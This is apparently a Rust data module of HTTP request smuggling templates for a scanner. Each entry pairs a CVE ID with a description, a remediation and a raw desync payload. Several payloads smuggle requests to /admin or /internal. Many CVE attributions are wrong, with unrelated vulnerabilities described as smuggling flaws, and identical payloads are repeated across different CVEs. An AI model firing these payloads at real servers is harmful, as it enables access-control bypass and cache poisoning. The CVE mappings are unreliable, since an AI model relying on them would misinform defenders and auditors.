use serde::{Deserialize, Serialize};

#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CveTemplate {
    pub id: String,
    pub year: u16,
    pub score: f32,
    pub title: String,
    pub variants: Vec<String>,
    pub affected: Vec<String>,
    pub description: String,
    pub payload_template: String,
    pub remediation: String,
    pub reference: String,
}

#[allow(dead_code)]
pub fn load_templates() -> Vec<CveTemplate> {
    vec![
        // HTTP/1.1 CL.TE / TE.CL
        CveTemplate {
            id: "CVE-2005-2087".into(),
            year: 2005,
            score: 5.0,
            title: "Original Request Smuggling Discovery".into(),
            variants: vec!["clte".into(), "tecl".into()],
            affected: vec!["Various (Watchfire discovery)".into()],
            description: "Original HTTP request smuggling discovery by Watchfire/CGISecurity".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: 0\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /404 HTTP/1.1\r\nHost: localhost\r\n\r\n".into(),
            remediation: "Use consistent HTTP parsing across proxy and backend".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2005-2087".into(),
        },
        CveTemplate {
            id: "CVE-2019-20372".into(),
            year: 2019,
            score: 7.5,
            title: "Nginx CL.TE via Error Page Body".into(),
            variants: vec!["clte".into()],
            affected: vec!["Nginx (various versions)".into()],
            description: "CL.TE desync via error page body consumption discrepancy".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: 0\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /404 HTTP/1.1\r\nHost: localhost\r\n\r\n".into(),
            remediation: "Upgrade Nginx and ensure consistent configuration".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2019-20372".into(),
        },
        CveTemplate {
            id: "CVE-2020-11077".into(),
            year: 2020,
            score: 6.5,
            title: "Puma TE.CL Smuggling".into(),
            variants: vec!["tecl".into()],
            affected: vec!["Puma (Ruby web server)".into()],
            description: "TE.CL desync via HTTP/1.1 pipelining with Transfer-Encoding".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n7c\r\n".into(),
            remediation: "Update Puma to patched version".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2020-11077".into(),
        },
        CveTemplate {
            id: "CVE-2020-9517".into(),
            year: 2020,
            score: 5.3,
            title: "Nginx CL.TE with Error Body".into(),
            variants: vec!["clte".into()],
            affected: vec!["Nginx".into()],
            description: "CL.TE desync via error page body in Nginx".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: 0\r\nTransfer-Encoding: chunked\r\n\r\n".into(),
            remediation: "Update Nginx to patched version".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2020-9517".into(),
        },
        CveTemplate {
            id: "CVE-2021-21287".into(),
            year: 2021,
            score: 9.0,
            title: "Kong/Envoy/Traefik CL.TE".into(),
            variants: vec!["clte".into()],
            affected: vec!["Kong API Gateway, Envoy, Traefik".into()],
            description: "CL.TE desync via non-standard Transfer-Encoding header variations".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: 0\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\n\r\n".into(),
            remediation: "Update reverse proxy to patched version".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2021-21287".into(),
        },
        CveTemplate {
            id: "CVE-2021-33194".into(),
            year: 2021,
            score: 7.5,
            title: "Go net/http CL/TE Desync".into(),
            variants: vec!["clte".into(), "tete".into()],
            affected: vec!["Go net/http library".into()],
            description: "Content-Length / Transfer-Encoding parsing discrepancy in Go HTTP library".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: 0\r\nTransfer-Encoding: chunked\r\n\r\n".into(),
            remediation: "Update Go to 1.16.12+ or 1.17.5+".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2021-33194".into(),
        },
        CveTemplate {
            id: "CVE-2022-4037".into(),
            year: 2022,
            score: 6.5,
            title: "GitLab + Devise Single-Endpoint Race".into(),
            variants: vec!["clte".into(), "timing".into()],
            affected: vec!["GitLab (via Devise authentication)".into()],
            description: "Single-endpoint race condition enabling email verification bypass via smuggling".into(),
            payload_template: "POST /users/auth/confirmation HTTP/1.1\r\nHost: <target>\r\nContent-Length: 0\r\nTransfer-Encoding: chunked\r\n\r\n".into(),
            remediation: "Update GitLab to patched version (HackerOne report)".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2022-4037".into(),
        },
        CveTemplate {
            id: "CVE-2024-27198".into(),
            year: 2024,
            score: 9.8,
            title: "JetBrains TeamCity Auth Bypass".into(),
            variants: vec!["clte".into()],
            affected: vec!["JetBrains TeamCity < 2023.11.4".into()],
            description: "Authentication bypass via CL.TE request smuggling in JetBrains TeamCity".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: 0\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\n\r\n".into(),
            remediation: "Update TeamCity to 2023.11.4+".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2024-27198".into(),
        },
        CveTemplate {
            id: "CVE-2025-55315".into(),
            year: 2025,
            score: 9.9,
            title: "Mass Credential Compromise via Chunk Extension".into(),
            variants: vec!["chunk-ext".into(), "tete".into()],
            affected: vec!["Multiple CDNs and reverse proxies".into()],
            description: "Chunk extension parsing discrepancy enabling mass credential compromise".into(),
            payload_template: "Transfer-Encoding: chunked\r\n\r\n5;ext=asdf\r\nHELLO\r\n0\r\n\r\n".into(),
            remediation: "Strict chunk encoding validation on all proxy layers".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2025-55315".into(),
        },
        CveTemplate {
            id: "CVE-2025-32094".into(),
            year: 2025,
            score: 9.1,
            title: "Akamai CL.0 Expect Desync".into(),
            variants: vec!["cl0".into(), "0cl".into()],
            affected: vec!["Akamai CDN (multiple versions)".into()],
            description: "CL.0 desync via obfuscated Expect header — 74 bounties totaling $221,000".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: <len>\r\nExpect: y 100-continue\r\n\r\n<smuggled>".into(),
            remediation: "Update Akamai CDN to patched version (Akamai Bug Bounty)".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2025-32094".into(),
        },
        CveTemplate {
            id: "CVE-2026-2332".into(),
            year: 2026,
            score: 9.8,
            title: "HTTP/3-to-HTTP/1.1 Downgrade Desync".into(),
            variants: vec!["h20".into(), "timing".into()],
            affected: vec!["HTTP/2 implementations with HTTP/3 front-end".into()],
            description: "HTTP/3 to HTTP/2 to HTTP/1.1 downgrade chain causing desync".into(),
            payload_template: "H3: QUIC stream injection → H2 frame manipulation → H1 smuggling".into(),
            remediation: "Protocol-consistent parsing across all downgrade paths".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2026-2332".into(),
        },

        // HTTP/2 Downgrade
        CveTemplate {
            id: "CVE-2022-22720".into(),
            year: 2022,
            score: 6.5,
            title: "Apache HTTPD 2.4 H2→H1 Pause Desync".into(),
            variants: vec!["h2cl".into(), "h2te".into()],
            affected: vec!["Apache HTTPD 2.4".into()],
            description: "HTTP/2 to HTTP/1.1 downgrade with pause-based desync via server-level redirect".into(),
            payload_template: "H2 HEADERS frame with injected Transfer-Encoding + delayed body".into(),
            remediation: "Update Apache HTTPD to 2.4.54+".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2022-22720".into(),
        },
        CveTemplate {
            id: "CVE-2023-25690".into(),
            year: 2023,
            score: 7.5,
            title: "Apache mod_proxy H2.CL/H2.TE".into(),
            variants: vec!["h2cl".into(), "h2te".into()],
            affected: vec!["Apache HTTPD mod_proxy".into()],
            description: "HTTP/2 to HTTP/1.1 downgrade desync via Content-Length and Transfer-Encoding header injection".into(),
            payload_template: "H2 HEADERS frame with injected Content-Length: 0 and Transfer-Encoding: chunked".into(),
            remediation: "Update Apache HTTPD to 2.4.56+".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2023-25690".into(),
        },
        CveTemplate {
            id: "CVE-2024-36099".into(),
            year: 2024,
            score: 7.5,
            title: "Guacamole H2→H1 Header Injection".into(),
            variants: vec!["h2cl".into()],
            affected: vec!["Apache Guacamole".into()],
            description: "HTTP/2 to HTTP/1.1 desync via malicious header injection in H2 downgrade".into(),
            payload_template: "H2 HEADERS frame with injected Content-Length".into(),
            remediation: "Update Apache Guacamole to patched version".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2024-36099".into(),
        },
        CveTemplate {
            id: "CVE-2025-26320".into(),
            year: 2025,
            score: 8.7,
            title: "Akamai H2→H1 Pseudo-Header Desync".into(),
            variants: vec!["h2cl".into(), "h2te".into()],
            affected: vec!["Akamai CDN".into()],
            description: "HTTP/2 to HTTP/1.1 downgrade desync via pseudo-header injection affecting multiple Akamai customers".into(),
            payload_template: "H2 HEADERS frame with manipulated :path pseudo-header".into(),
            remediation: "Update Akamai configuration or apply vendor patch".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2025-26320".into(),
        },

        // CL.0 / Client-Side Desync
        CveTemplate {
            id: "CVE-2022-22963".into(),
            year: 2022,
            score: 8.0,
            title: "CL.0 via Browser Fetch".into(),
            variants: vec!["cl0".into(), "client-desync".into()],
            affected: vec!["Various".into()],
            description: "Browser-based CL.0 desync via fetch() API — backend ignores Content-Length".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: <len>\r\n\r\n<smuggled>".into(),
            remediation: "Ensure backend consumes Content-Length for POST requests".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2022-22963".into(),
        },
        CveTemplate {
            id: "CVE-2022-20713".into(),
            year: 2022,
            score: 7.5,
            title: "Cisco ASA WebVPN CSD".into(),
            variants: vec!["client-desync".into()],
            affected: vec!["Cisco ASA WebVPN".into()],
            description: "Client-side desync via homepage POST to cache poison (vendor won't fix)".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: <len>\r\n\r\n<smuggled>".into(),
            remediation: "No official fix — add WAF rules to block oversized POST bodies".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2022-20713".into(),
        },
        CveTemplate {
            id: "CVE-2022-23959".into(),
            year: 2022,
            score: 7.5,
            title: "Varnish Pause-Based Desync".into(),
            variants: vec!["timing".into()],
            affected: vec!["Varnish Cache".into()],
            description: "Pause-based desync via synth() with 15s timeout in Varnish".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: 100000\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nx\r\n0\r\n\r\n".into(),
            remediation: "Update Varnish to latest version".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2022-23959".into(),
        },
        CveTemplate {
            id: "CVE-2024-28253".into(),
            year: 2024,
            score: 7.5,
            title: "CL.0 Cache Poison".into(),
            variants: vec!["cl0".into()],
            affected: vec!["Various CDN/proxy configurations".into()],
            description: "CL.0 desync combined with cache poisoning to serve malicious content".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: <len>\r\n\r\n<smuggled-prefix>".into(),
            remediation: "Enforce Content-Length consumption on backend".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2024-28253".into(),
        },

        // h2c / Protocol Upgrade
        CveTemplate {
            id: "CVE-2020-15503".into(),
            year: 2020,
            score: 7.5,
            title: "HAProxy h2c Backend Bypass".into(),
            variants: vec!["h20".into()],
            affected: vec!["HAProxy + h2c-capable backend".into()],
            description: "Proxy bypass via h2c upgrade — attacker tunnels directly to H2 backend".into(),
            payload_template: "GET / HTTP/1.1\r\nHost: <target>\r\nUpgrade: h2c\r\nHTTP2-Settings: <settings>\r\nConnection: Upgrade, HTTP2-Settings\r\n\r\n".into(),
            remediation: "Disable h2c on backends or filter Upgrade headers".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2020-15503".into(),
        },
        CveTemplate {
            id: "CVE-2022-0861".into(),
            year: 2022,
            score: 7.5,
            title: "McAfee Web Gateway h2c Bypass".into(),
            variants: vec!["h20".into()],
            affected: vec!["McAfee Web Gateway".into()],
            description: "h2c smuggling + proxy bypass on McAfee Web Gateway".into(),
            payload_template: "Upgrade: h2c\r\nConnection: Upgrade\r\n\r\nPRI * HTTP/2.0\r\n\r\nSM\r\n\r\n".into(),
            remediation: "Update McAfee Web Gateway to patched version".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2022-0861".into(),
        },

        // CPDoS / Cache Poisoning
        CveTemplate {
            id: "CVE-2020-27786".into(),
            year: 2020,
            score: 7.5,
            title: "CPDoS via Kernel/Container".into(),
            variants: vec!["cl0".into(), "timing".into()],
            affected: vec!["Kernel/container configurations".into()],
            description: "Cache Poisoning via Denial of Service — oversized body triggers error page cached as legitimate".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: <large>\r\nTransfer-Encoding: chunked\r\n\r\n".into(),
            remediation: "Reject conflicting Content-Length and Transfer-Encoding headers".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2020-27786".into(),
        },
        CveTemplate {
            id: "CVE-2024-21893".into(),
            year: 2024,
            score: 8.7,
            title: "Ivanti SSRF via Cache Poison".into(),
            variants: vec!["clte".into(), "expect100".into()],
            affected: vec!["Ivanti Connect Secure".into()],
            description: "SSRF via request smuggling chain to cache poisoning — Ivanti zero-day chain".into(),
            payload_template: "POST / HTTP/1.1\r\nHost: <target>\r\nContent-Length: 0\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /internal HTTP/1.1\r\nHost: localhost\r\n\r\n".into(),
            remediation: "Apply Ivanti patch from February 2024 advisory".into(),
            reference: "https://nvd.nist.gov/vuln/detail/CVE-2024-21893".into(),
        },
    ]
}


